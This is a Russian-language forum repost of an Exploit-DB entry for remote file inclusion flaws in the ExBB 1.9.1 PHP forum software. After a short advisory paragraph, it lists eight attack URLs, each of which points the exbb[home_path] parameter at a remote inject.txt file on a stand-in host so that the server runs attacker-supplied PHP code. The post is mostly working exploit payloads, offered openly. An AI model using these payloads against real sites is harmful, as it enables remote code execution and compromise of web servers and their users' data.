Exploit ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28467
Проверка EDB
  1. Пройдено
Автор
MATDHULE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-08-31
Код:
source: https://www.securityfocus.com/bid/19787/info

ExBB is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect ExBB 1.9.1; other versions may also be vulnerable.

http://www.example.com/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://www.example2.com/inject.txt? http://www.example.com/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://www.example2.com/inject.txt?
 
Источник
www.exploit-db.com

Похожие темы